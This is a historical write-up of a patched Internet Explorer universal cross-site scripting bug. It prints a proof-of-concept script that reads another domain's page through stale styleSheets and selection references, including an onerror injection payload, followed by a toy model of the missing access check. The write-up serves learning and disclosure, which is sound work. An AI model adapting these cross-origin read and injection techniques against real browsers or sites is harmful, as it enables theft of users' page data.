This UXSS relied on the fact that certain live collections returned by the DOM — specifically document.styleSheets and document.selection — remain valid and readable after the window they came from has navigated to a different domain. Saving one of these collection references before a redirect and then accessing it after the redirect completed gave full read access to the target document.

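<script language="JavaScript">
var win, xselection, xstyleSheets;

function f_xstyleSheets()
{
    win = window.open("redirect.aspx","","width=200,height=200");
    // Save the live collection before redirect.aspx redirects to the other domain.
    xstyleSheets = win.document.styleSheets;
    // After the redirect, the saved collection still resolves to the new document.
    setTimeout("alert(xstyleSheets[0].owningElement.ownerDocument.body.innerText);",2000);
}

function f_xselection()
{
    win = window.open("redirect.aspx","","width=200,height=200");
    // Save the selection object before the redirect, use it afterwards.
    xselection = win.document.selection;
    setTimeout("insertImage()",2000);
}

function insertImage()
{
    var range = xselection.createRange();
    // The image "URL" closes the src attribute and adds an onerror handler,
    // which fires in the redirected document's context.
    range.execCommand("InsertImage", null, '1" onerror="if (!window.hasRun) { window.hasRun = true; alert(document.body.innerText)}');
}
</script>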
<input type="button" onclick="f_xstyleSheets()" value="xDom using document.styleSheets">
<input type="button" onclick="f_xselection()" value="xDom document.selection">

The styleSheets path is the simpler one: after the redirect the cached collection still references the new document’s style sheets, and owningElement.ownerDocument gives direct access to the new document’s body. The selection path is more indirect — it uses createRange().execCommand("InsertImage") with a crafted URL containing an onerror handler, which fires in the redirected document’s context. Both techniques were confirmed on Vista IE7 and Windows 7 IE8/IE9.
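The root cause described above is an access check made when the collection is handed out but not when it is used. The following toy model is an added example, not Internet Explorer code and not the fix Microsoft shipped; every class, function and origin in it is hypothetical, and re-checking the origin on use is an assumed mitigation shown for contrast.

```javascript
// Constructed toy model of the bug class; not Internet Explorer code.
// All class and function names here are hypothetical.
class Doc {
  constructor(origin, bodyText) {
    this.origin = origin;
    this.bodyText = bodyText;
  }
}

class Win {
  constructor(doc) { this.doc = doc; }
  navigate(doc) { this.doc = doc; }   // navigation swaps the document
}

// Flawed design: the collection is bound to the window and resolves the
// *current* document on every use, with no access check at use time.
class UncheckedSheets {
  constructor(win, callerOrigin) { this.win = win; this.callerOrigin = callerOrigin; }
  ownerBodyText() { return this.win.doc.bodyText; }
}

// Hardened design (assumed mitigation): repeat the same-origin check on use.
class CheckedSheets extends UncheckedSheets {
  ownerBodyText() {
    if (this.win.doc.origin !== this.callerOrigin) {
      throw new Error("SecurityError: cross-origin access denied");
    }
    return super.ownerBodyText();
  }
}

// Both designs check the caller's origin when the collection is handed out.
function getStyleSheets(win, callerOrigin, Impl) {
  if (win.doc.origin !== callerOrigin) {
    throw new Error("SecurityError: cross-origin access denied");
  }
  return new Impl(win, callerOrigin);
}

// Acquire while same-origin, navigate cross-origin, then use the stale reference.
function staleAccess(Impl) {
  const caller = "https://opener.example";            // constructed origins
  const win = new Win(new Doc(caller, "redirect page"));
  const sheets = getStyleSheets(win, caller, Impl);
  win.navigate(new Doc("https://other.example", "other-origin content"));
  try { return sheets.ownerBodyText(); } catch (e) { return "blocked: " + e.message; }
}

console.log(staleAccess(UncheckedSheets));
console.log(staleAccess(CheckedSheets));
```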

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.